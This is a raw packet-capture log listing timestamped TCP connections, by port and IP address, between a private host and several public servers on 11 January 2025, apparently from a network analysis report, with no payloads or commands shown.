                                                                                                                                                                  Jan 11, 2025 07:54:31.201940060 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.202054977 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.202449083 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.202631950 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.202718019 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.204404116 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.204436064 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.204647064 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.204683065 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.204798937 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.204881907 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.204898119 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.204924107 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.205135107 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.206819057 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.206851959 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.206998110 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.207056999 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.207075119 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.207164049 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.207334042 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.208589077 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.208621025 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.208852053 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.208889961 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.208934069 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.209033012 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.209059954 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.209091902 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.209213972 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.210870028 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.210902929 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.211047888 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.211100101 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.211127043 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.211208105 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.211400986 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.212690115 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.212721109 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.212913036 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.212970972 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.212992907 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.213022947 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.213156939 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.213470936 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.213639975 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.213726997 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.215281963 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.215313911 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.215456963 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.215508938 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.215533972 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.215655088 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.215795040 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.215943098 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.216095924 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.216195107 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.217787981 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.217835903 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.218008995 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.218051910 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.218071938 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.218182087 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.219702005 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.219748974 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.219835997 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.219856977 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.219997883 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.220005989 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.220021009 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.220326900 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.221571922 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.221604109 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.221743107 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.221807957 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.221820116 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.221915960 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.223401070 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.223438978 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.223644018 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.223659992 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.223710060 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.224170923 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.224395037 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.224407911 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.225661993 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.225702047 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.225838900 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.225851059 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.225907087 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.226084948 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.226447105 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.226643085 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.226811886 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.227257967 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.227293015 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.227466106 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.227627993 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.227650881 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.228287935 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.228331089 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.228493929 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.228493929 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.228598118 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.228624105 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.228775978 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.230015993 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.230057001 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.230237961 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.230259895 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.230393887 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.230433941 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.230511904 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.231549978 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.231599092 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.231755018 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.231794119 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.231873989 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.232026100 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.233227015 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.233268976 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.233416080 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.233586073 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.233624935 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.233649015 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.234087944 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.234316111 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.234355927 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.234369040 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.234697104 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.234889984 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.235033989 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.235136032 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.235188007 CET62304443192.168.11.2023.45.46.202
                                                                                                                                                                  Jan 11, 2025 07:54:31.235219002 CET4436230423.45.46.202192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.315941095 CET4976980192.168.11.2094.23.158.211
                                                                                                                                                                  Jan 11, 2025 07:54:31.398823023 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.399230957 CET63290443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.399260998 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.400291920 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.400669098 CET63290443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.400938034 CET44363290162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.454869986 CET63290443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.474648952 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.474972963 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.474996090 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.476483107 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.476931095 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:31.477225065 CET44353302162.159.61.3192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:31.517154932 CET53302443192.168.11.20162.159.61.3
                                                                                                                                                                  Jan 11, 2025 07:54:32.108527899 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.137840033 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:32.150259972 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.178231001 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.234818935 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.234873056 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.235037088 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.235234976 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.235259056 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.316901922 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.317022085 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.317159891 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:32.317553043 CET59765443192.168.11.203.167.152.61
                                                                                                                                                                  Jan 11, 2025 07:54:32.317594051 CET443597653.167.152.61192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.394123077 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.394330025 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.394551039 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.395360947 CET51731443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.395392895 CET4435173120.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.457535982 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.457582951 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.457705021 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.457920074 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.457953930 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.641084909 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.641103029 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.641355038 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.641467094 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.641479015 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.666105986 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.667982101 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.667989016 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.668924093 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.669292927 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.671469927 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.671574116 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.673034906 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.673043013 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.673084974 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.673120022 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.699259996 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.699678898 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.699691057 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.700047970 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.700462103 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.700541973 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.700546980 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.700565100 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.717003107 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:32.748963118 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.760426998 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.760462999 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.760637045 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.760781050 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:32.760806084 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.892221928 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.892728090 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.892751932 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.893641949 CET50462443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:32.893675089 CET44350462204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.893930912 CET50462443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:32.894078016 CET50462443192.168.11.20204.79.197.203
                                                                                                                                                                  Jan 11, 2025 07:54:32.894100904 CET44350462204.79.197.203192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.894659042 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.894887924 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.898720026 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:32.898741007 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.898755074 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:32.898792982 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.898890972 CET64664443192.168.11.2013.107.42.14
                                                                                                                                                                  Jan 11, 2025 07:54:32.898926020 CET4436466413.107.42.14192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.899019957 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:32.899040937 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:32.899141073 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:32.899161100 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.899251938 CET64664443192.168.11.2013.107.42.14
                                                                                                                                                                  Jan 11, 2025 07:54:32.899270058 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:32.899280071 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.899333954 CET64664443192.168.11.2013.107.42.14
                                                                                                                                                                  Jan 11, 2025 07:54:32.899353981 CET4436466413.107.42.14192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.899738073 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.899832964 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.899957895 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.955442905 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:32.955466986 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.996932983 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.997033119 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:32.997157097 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.997554064 CET54685443192.168.11.20108.159.227.71
                                                                                                                                                                  Jan 11, 2025 07:54:32.997575045 CET44354685108.159.227.71192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.001243114 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:33.011945963 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.012026072 CET4436474013.89.179.10192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.012305975 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:33.012305975 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:33.012305975 CET64740443192.168.11.2013.89.179.10
                                                                                                                                                                  Jan 11, 2025 07:54:33.119884014 CET61880443192.168.11.2034.235.241.123
                                                                                                                                                                  Jan 11, 2025 07:54:33.119919062 CET4436188034.235.241.123192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.120130062 CET61880443192.168.11.2034.235.241.123
                                                                                                                                                                  Jan 11, 2025 07:54:33.120291948 CET61880443192.168.11.2034.235.241.123
                                                                                                                                                                  Jan 11, 2025 07:54:33.120316029 CET4436188034.235.241.123192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.124957085 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.125185013 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.125299931 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:33.125327110 CET4435366523.33.85.243192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.125344992 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:33.125540018 CET53665443192.168.11.2023.33.85.243
                                                                                                                                                                  Jan 11, 2025 07:54:33.128530025 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.128948927 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:33.128973961 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.129715919 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.130162954 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:33.130291939 CET58048443192.168.11.2020.125.209.212
                                                                                                                                                                  Jan 11, 2025 07:54:33.130314112 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.130362034 CET4435804820.125.209.212192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.134351969 CET64133443192.168.11.2023.78.12.23
                                                                                                                                                                  Jan 11, 2025 07:54:33.134388924 CET4436413323.78.12.23192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.134582043 CET64133443192.168.11.2023.78.12.23
                                                                                                                                                                  Jan 11, 2025 07:54:33.134722948 CET64133443192.168.11.2023.78.12.23
                                                                                                                                                                  Jan 11, 2025 07:54:33.134748936 CET4436413323.78.12.23192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.150490999 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.150816917 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:33.150835037 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.151258945 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.151540041 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:33.151565075 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.152713060 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.152909040 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:33.154093981 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:33.154094934 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.154190063 CET53719443192.168.11.20151.101.1.44
                                                                                                                                                                  Jan 11, 2025 07:54:33.154198885 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.154292107 CET44353719151.101.1.44192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.154306889 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:33.155292988 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:33.155363083 CET54856443192.168.11.2064.74.236.223
                                                                                                                                                                  Jan 11, 2025 07:54:33.155379057 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.155472040 CET4435485664.74.236.223192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.164328098 CET62695443192.168.11.20104.19.129.76
                                                                                                                                                                  Jan 11, 2025 07:54:33.164367914 CET44362695104.19.129.76192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.164549112 CET62695443192.168.11.20104.19.129.76
                                                                                                                                                                  Jan 11, 2025 07:54:33.164658070 CET62695443192.168.11.20104.19.129.76
                                                                                                                                                                  Jan 11, 2025 07:54:33.164674997 CET44362695104.19.129.76192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:54:33.181756020 CET58048443192.168.11.2020.125.209.212
